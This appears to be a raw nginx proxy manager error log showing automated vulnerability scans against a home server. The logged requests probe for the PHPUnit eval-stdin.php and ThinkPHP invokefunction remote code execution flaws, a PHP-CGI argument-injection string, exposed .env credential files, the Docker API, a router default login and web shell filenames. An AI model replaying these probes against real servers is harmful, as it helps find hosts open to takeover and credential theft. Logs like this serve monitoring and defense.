"/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:20 [error] 417#417: *310158 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:20 [error] 417#417: *310158 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:21 [error] 417#417: *310158 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:22 [error] 417#417: *310158 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:23 [error] 417#417: *310158 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:23 [error] 417#417: *310158 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:24 [error] 417#417: *310158 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:25 [error] 417#417: *310158 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:25 [error] 417#417: *310158 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:26 [error] 417#417: *310158 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:27 [error] 417#417: *310158 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:28 [error] 417#417: *310158 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:28 [error] 417#417: *310158 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:29 [error] 417#417: *310158 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:30 [error] 417#417: *310158 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:31 [error] 417#417: *310158 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:31 [error] 417#417: *310158 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:32 [error] 417#417: *310158 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:33 [error] 417#417: *310158 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:33 [error] 417#417: *310158 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:34 [error] 417#417: *310158 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:36 [error] 417#417: *310158 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:37:46 [error] 417#417: *310173 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:42:02 [error] 417#417: *310176 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 04:06:25 [error] 414#414: *310206 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 94.243.10.63, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" +2026/01/19 05:02:37 [error] 422#422: *310253 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 05:02:38 [error] 423#423: *310254 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 05:02:38 [error] 424#424: *310255 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 05:02:38 [error] 421#421: *310256 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 05:02:38 [error] 421#421: *310257 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/19 05:02:39 [error] 421#421: *310258 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/19 05:38:50 [error] 421#421: *310286 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "91.82.83.208" +2026/01/19 06:29:49 [error] 422#422: *310331 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:50 [error] 422#422: *310331 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:50 [error] 422#422: *310331 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:50 [error] 422#422: *310331 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:51 [error] 422#422: *310331 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:51 [error] 422#422: *310331 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:51 [error] 422#422: *310331 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:52 [error] 422#422: *310331 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:52 [error] 422#422: *310331 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:52 [error] 422#422: *310331 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:52 [error] 422#422: *310331 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:53 [error] 422#422: *310331 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:53 [error] 422#422: *310331 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:53 [error] 422#422: *310331 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:54 [error] 422#422: *310331 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:54 [error] 422#422: *310331 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:54 [error] 422#422: *310331 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:54 [error] 422#422: *310331 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:55 [error] 422#422: *310331 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:55 [error] 422#422: *310331 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:55 [error] 422#422: *310331 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:56 [error] 422#422: *310331 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:56 [error] 422#422: *310331 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:57 [error] 422#422: *310331 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:57 [error] 422#422: *310331 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:57 [error] 422#422: *310331 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:58 [error] 422#422: *310331 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:58 [error] 422#422: *310331 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:58 [error] 422#422: *310331 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:59 [error] 422#422: *310331 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:59 [error] 422#422: *310331 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:29:59 [error] 422#422: *310331 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:00 [error] 422#422: *310331 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:00 [error] 422#422: *310331 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:00 [error] 422#422: *310331 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:01 [error] 422#422: *310331 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:01 [error] 422#422: *310331 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:02 [error] 422#422: *310331 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:02 [error] 422#422: *310331 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:02 [error] 422#422: *310331 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:30:03 [error] 422#422: *310331 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 190.129.122.221, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 06:40:34 [error] 422#422: *310342 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:35 [error] 422#422: *310342 open() "/var/www/html/eee.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /eee.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:35 [error] 422#422: *310342 open() "/var/www/html/webadmin.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /webadmin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:35 [error] 422#422: *310342 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:36 [error] 422#422: *310342 open() "/var/www/html/tinyfilemanager.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /tinyfilemanager.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:36 [error] 422#422: *310342 open() "/var/www/html/class.api.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /class.api.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:36 [error] 422#422: *310342 open() "/var/www/html/support.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /support.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:36 [error] 422#422: *310342 open() "/var/www/html/wp-content/themes/finley/min.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/finley/min.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:37 [error] 422#422: *310342 open() "/var/www/html/dox.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /dox.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:37 [error] 422#422: *310342 open() "/var/www/html/siteheads.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /siteheads.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:37 [error] 422#422: *310342 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:37 [error] 422#422: *310342 open() "/var/www/html/wp-admin/images/admin.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:38 [error] 422#422: *310342 open() "/var/www/html/wp-logout.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-logout.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:38 [error] 422#422: *310342 open() "/var/www/html/87.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /87.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:38 [error] 422#422: *310342 open() "/var/www/html/0o0.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /0o0.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:38 [error] 422#422: *310342 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:39 [error] 422#422: *310342 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:39 [error] 422#422: *310342 open() "/var/www/html/wsheet1.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wsheet1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:39 [error] 422#422: *310342 open() "/var/www/html/wp-admin/css/colors/about.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:39 [error] 422#422: *310342 open() "/var/www/html/size.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /size.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:40 [error] 422#422: *310342 open() "/var/www/html/ms-users.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ms-users.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:40 [error] 422#422: *310342 open() "/var/www/html/wp-admin/js/about.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:40 [error] 422#422: *310342 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /goods.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:40 [error] 422#422: *310342 open() "/var/www/html/revision.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /revision.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:41 [error] 422#422: *310342 open() "/var/www/html/12.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /12.php 